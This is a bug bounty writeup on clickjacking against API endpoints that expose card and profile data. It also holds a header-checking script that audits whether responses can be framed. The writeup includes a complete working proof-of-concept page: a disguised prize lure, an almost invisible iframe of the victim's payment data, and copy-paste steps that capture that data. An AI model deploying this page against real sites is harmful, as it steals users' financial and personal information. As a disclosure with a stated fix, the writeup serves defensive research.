$1800 worth of Clickjacking

Osama Avvan
Jun 21, 2019


In this writeup, I will talk about how I earned a total of $1800 by exploiting clickjacking on pages where sensitive user information was disclosed. It was a private program on Bugcrowd.

There were several API endpoints that disclosed user information such as credit card data, email, name, phone, address, user ID, etc.:

https://example.com/api/v1/wallet/payments?language=en

https://example.com/api/v1/profile/personal

https://example.com/api/v1/wallet/address/shipping

https://www.example.com/no-cache/profileSystem/getProfile

None of these endpoints sent an X-Frame-Options header, so I was able to load them in an iframe.
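Whether a response can be framed is decided by two headers, not one: browsers honour a Content-Security-Policy frame-ancestors directive in preference to X-Frame-Options, and only fall back to X-Frame-Options when the directive is absent. The following is an added example, not code from the original writeup, that reproduces that decision so a list of endpoints can be triaged offline. The header sets, the attacker origin https://evil.example and the partner hostnames are constructed for illustration; only the https://example.com origin comes from the writeup.

```javascript
// Added example (not from the original writeup): decide whether a response's
// anti-framing headers allow it to be embedded in an <iframe> on another origin.

const DEFAULT_PORT = { "https:": "443", "http:": "80" };

// Case-insensitive header lookup on a plain { name: value } object.
function header(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

// Extract the frame-ancestors source list from a CSP value.
// Returns null when the directive is absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1).map((t) => t.replace(/^'|'$/g, "").toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source token match the embedding origin?
// Supports 'none', 'self', '*', scheme sources ("https:") and host sources
// with optional scheme, "*." wildcard and port; path-based sources are not
// valid in frame-ancestors and are treated as non-matching.
function sourceMatches(token, framerOrigin, pageOrigin) {
  if (token === "none") return false;
  if (token === "*") return true;
  if (token === "self") return framerOrigin === pageOrigin;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(token)) return framer.protocol === token;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(token);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme + ":" !== framer.protocol) return false;
  // "*.partner.example" matches subdomains only, not the bare domain.
  const hostOk = wildcard ? framer.hostname.endsWith("." + host) : framer.hostname === host;
  if (!hostOk) return false;
  // URL.port is "" for the scheme's default port; a token without a port
  // matches only that default port.
  if (port === undefined) return framer.port === "";
  return port === "*" || port === (framer.port || DEFAULT_PORT[framer.protocol]);
}

// Combine the two headers the way browsers do: frame-ancestors wins when present.
function isFramable(headers, pageOrigin, framerOrigin) {
  const ancestors = frameAncestors(header(headers, "content-security-policy"));
  if (ancestors !== null) {
    return ancestors.some((t) => sourceMatches(t, framerOrigin, pageOrigin));
  }
  const xfo = (header(headers, "x-frame-options") || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framerOrigin === pageOrigin;
  // ALLOW-FROM is obsolete and ignored by current browsers; an unrecognised or
  // missing value leaves the response framable, which is the writeup's finding.
  return true;
}

// Constructed header sets (not captured from the target).
const PAGE_ORIGIN = "https://example.com";
const ATTACKER_ORIGIN = "https://evil.example";
const samples = {
  vulnerable: { "Content-Type": "application/json" },                    // as in the writeup
  xfoDeny: { "X-Frame-Options": "DENY" },                                // refuse all framing
  xfoSameOrigin: { "X-Frame-Options": "SAMEORIGIN" },                    // same-origin framing only
  cspNone: { "X-Frame-Options": "SAMEORIGIN",
             "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
  cspWildcard: { "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example" },
};

// Report which sample responses the attacker origin could frame.
function audit(samples, pageOrigin, framerOrigin) {
  const out = {};
  for (const [name, headers] of Object.entries(samples)) {
    out[name] = isFramable(headers, pageOrigin, framerOrigin);
  }
  return out;
}

console.log(audit(samples, PAGE_ORIGIN, ATTACKER_ORIGIN));
```

Run against real traffic by replacing the sample objects with the response headers of each endpoint; anything that comes back `true` for an origin you do not control is a candidate for the technique described in this writeup. Note the cspWildcard case: a wildcard subdomain allow-list is only as safe as the weakest host under it.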

Next I had to create an HTML page that tricks the user into leaking their own information. So I created the following page.

HTML CODE

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

<div id="parent">

<center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win $100</h1></center>

<!-- Step 1: the victim focuses the near-invisible iframe and copies its contents.
     The framed response is the victim's own JSON (card data, email, ...), served
     with their session cookie; opacity 0.01 hides it while keeping it focusable. -->
<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style="border: 2px solid gray;">
<iframe src="https://example.com/api/v1/wallet/payments?language=en" width="100%" style="opacity: 0.01"></iframe>
</div>

<!-- Step 2: the victim pastes the copied data into a field on the attacker's page.
     A password input is used so the pasted text stays masked on screen. -->
<h3>Click inside the box and press CTRL+V</h3>
<input type="password" name="" size="1">
<!-- <textarea rows="1" cols="1" style="resize: none;"></textarea> -->
<br>
<button id="btn">Click to Win</button>

</div>

<script>
// Step 3: on click, the attacker's page holds the pasted data. This PoC only
// logs it to the console; a real attack would send it to an attacker-controlled server.
document.querySelector("#btn").onclick = function() {
  console.log(document.querySelector("input").value)
  alert("Congratulation! You have won $100")
}
</script>

</body>
</html>

Once the victim has followed all the steps and clicks the button, the pasted response (card data, email, name, etc.) is logged to the console. The PoC stops there; an attacker would send the value to a server they control instead. The fix is to stop the API responses from being framed at all, with X-Frame-Options: DENY or, preferably, a Content-Security-Policy frame-ancestors 'none' directive.

So that was it. Thank you for reading.
